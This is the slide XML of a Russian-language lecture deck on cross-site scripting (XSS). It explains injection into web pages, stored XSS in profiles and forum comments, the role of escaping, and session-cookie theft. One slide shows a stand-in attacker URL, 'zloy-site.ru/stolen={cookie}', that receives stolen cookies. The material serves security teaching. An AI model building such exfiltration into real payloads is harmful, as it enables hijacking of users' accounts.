              <a:t> (XSS) — пожалуй, самый типичный вид уязвимостей, широко распространённых в веб-приложениях. По статистике, около 65 % сайтов в той или иной форме уязвимы для XSS-атак. Эти данные должны пугать вас так же, как пугают меня.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304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E083BDC-190D-45D3-0D3A-AA79E52BCF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5154" y="3429000"/>
            <a:ext cx="3501691" cy="347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907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C034D3-60B9-975F-EDAC-5BA790A51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XSS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EB3EE9A-FA2E-05AC-70B7-4E7DE698C9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b="1" dirty="0"/>
              <a:t>XSS-атака</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> происходит, когда злоумышленник получает возможность внедрить скрипт (зачастую </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>) в страницу, выдаваемую веб-приложением, и выполнить его в браузере клиента. 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Обычно это делается с помощью переключения контекста данных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> в скриптовый контекст, чаще всего — когда внедряется новый код </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>HTML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> CSS-разметка</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> достаточно мест, где можно добавить в страницу исполняемый скрипт, а браузеры предоставляют немало способов сделать это. Любые входные данные веб-приложения, например параметры </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>HTTP-запросов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, способны внедрить код.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78123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3B5A30-F7B4-5D16-5BAF-F08EF448E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Ох уж эти </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>шники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751E5AC-26C3-7D53-0BEC-A6D123C017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Одна из проблем, связанных с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, — постоянная недооценка со стороны программистов, нетипичная для уязвимостей такого серьёзного уровня. Разработчики зачастую не представляют себе степень угрозы и обычно строят защиту, основанную на неверных взглядах и плохих подходах. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Особенно это касается </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, если код пишут разработчики без достаточных умений и познаний. Кроме того, реальные примеры </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS-атак</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> выглядят простыми и наивными, так что изучающие их программисты считают свою защиту достаточной, пока она их устраивает. Нетрудно понять, откуда взялись 65 % уязвимых сайтов.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94255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67EC25-17E1-BA56-C220-3A3F37DFB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Принцип работы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29F609D-E222-5C02-EDD9-5630FE1AD3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0147" y="1394763"/>
            <a:ext cx="9031705" cy="4975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154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7946BC24-3908-728D-1A27-5CF3151984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Например, можно добавить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> в поле ввода, текст из которого сохраняется и в дальнейшем отображается на странице для всех пользователей. Это может быть поле для ввода информации о себе на странице профиля социальной сети или комментарии на форуме.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Злоумышленник вводит текст (и за одно вредоносный код), который сохраняется на странице. Когда другие пользователи зайдут на эту же страницу, вместе с текстом они загрузят и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> злоумышленника. Именно в момент загрузки этот код отработает.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3075025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16E098-E0DF-C1F0-A347-0393927E4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Почему это происходит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6EF74B5-A691-9835-E028-C6BCC70BD3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dirty="0"/>
              <a:t>Суть в том, что браузер не может самостоятельно отличить обычный текст от текста, который является </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>CSS, HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> JavaScript-кодом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. Он будет пытаться обрабатывать все, что находится между тегами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&gt;, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. Все, что находится между тегами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>&gt;, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>считать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. И все, что похоже на тег, считать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>HTML-кодом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>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Если разработчик хочет, чтобы какой-то текст только выглядел как код, но таковым не являлся (то есть не обрабатывался браузером, а выводился как есть), этот текст надо специально обработать прежде, чем отдать его браузеру. Такая обработка называется “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0"/>
              <a:t>экранированием</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6805075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46A21A-364F-395E-A11D-758EC5F9C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Чем опасна?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4B77621-5D5E-0B3A-58B4-6593BE1977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9621"/>
            <a:ext cx="10515600" cy="5113254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/>
              <a:t>Сама по себе уязвимость не является опасной. Опасной она становится тогда, когда ее находит злоумышленник и начинает ее использовать в своих целях. Использование уязвимости называется “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>вектором атаки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>”. В случае </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> векторов атаки довольно много.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Самый простой пример — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>кража </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>авторизационных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> пользователей веб-приложения. Все </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> хранятся на компьютере пользователей. Если я авторизуюсь своим пользователем, я буду видеть свое значение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. А значение чужой просто так узнать не смогу.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>То же касается </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-кода</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, который выполняется в браузере пользователя. Этот </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> будет видеть значение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> того пользователя, в браузере которого он исполняется и только его.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Теперь допустим, что злоумышленнику удастся внедрить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> на страницу веб-приложения. У любого пользователя, который теперь зайдет на эту страницу, будет исполняться в браузере </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. Он будет читать значение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> этого пользователя (теперь уже жертвы). Осталось только передать это значение злоумышленнику — и дело сделано. Но как передать значение, ведь вредоносный код исполняется в браузере жертвы?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Все довольно просто. Этот же </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>JavaScript-код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> может создать запрос на удаленный сервер. Например, на вот такой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.zloy-site.ru/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stolen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>значение_cookie_жертвы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Домен </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zloy-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> принадлежит злоумышленнику из нашего примера. Все запросы, которые приходят на этот домен, записываются в базу данных. Посмотрев на параметры </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, злоумышленник узнает значения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> жертв и сможет их использовать, чтобы попасть в их аккаунты.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29376245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F85046-1285-763E-D0E2-1B641E7D2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Рассмотрим пример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0E88B66-A975-B36F-6A90-5CA427CF59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У меня есть тестовый сайт на локальном сервере, рассмотрим его:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>Мда</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, книжки не жизнеутверждающие   :/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Это по сути очень простой каталог книг, в котором есть поиск. Если ввести в запросе “Рей Брэдбери” мы увидим все книги, которые есть в этом каталоге этого автора.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5D60E80-6A1B-7581-32B1-82C4D85420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825625"/>
            <a:ext cx="6011606" cy="4045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2362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4518</TotalTime>
  <Words>1480</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>62</Paragraphs>
  <Slides>18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Тема Office</vt:lpstr>
      <vt:lpstr>Эксплуатация веб-уязвимостей Межсайтовый скриптинг</vt:lpstr>
      <vt:lpstr>Введение</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Ох уж эти PHP-шники</vt:lpstr>
      <vt:lpstr>Принцип работы</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Почему это происходит</vt:lpstr>
      <vt:lpstr>Чем опасна?</vt:lpstr>
      <vt:lpstr>Рассмотрим пример</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Способов закрыть ошибку довольно много</vt:lpstr>
      <vt:lpstr>Более жестокий, но реальный пример</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Заключение </vt:lpstr>
      <vt:lpstr>Домашнее задание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Урок 2: Команды Bash</dc:title>
  <dc:creator>Felix Edmundovich</dc:creator>
  <cp:lastModifiedBy>Felix Edmundovich</cp:lastModifiedBy>
  <cp:revision>136</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-18T22:46:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-20T23:27:15Z</dcterms:modified>
</cp:coreProperties>
</file>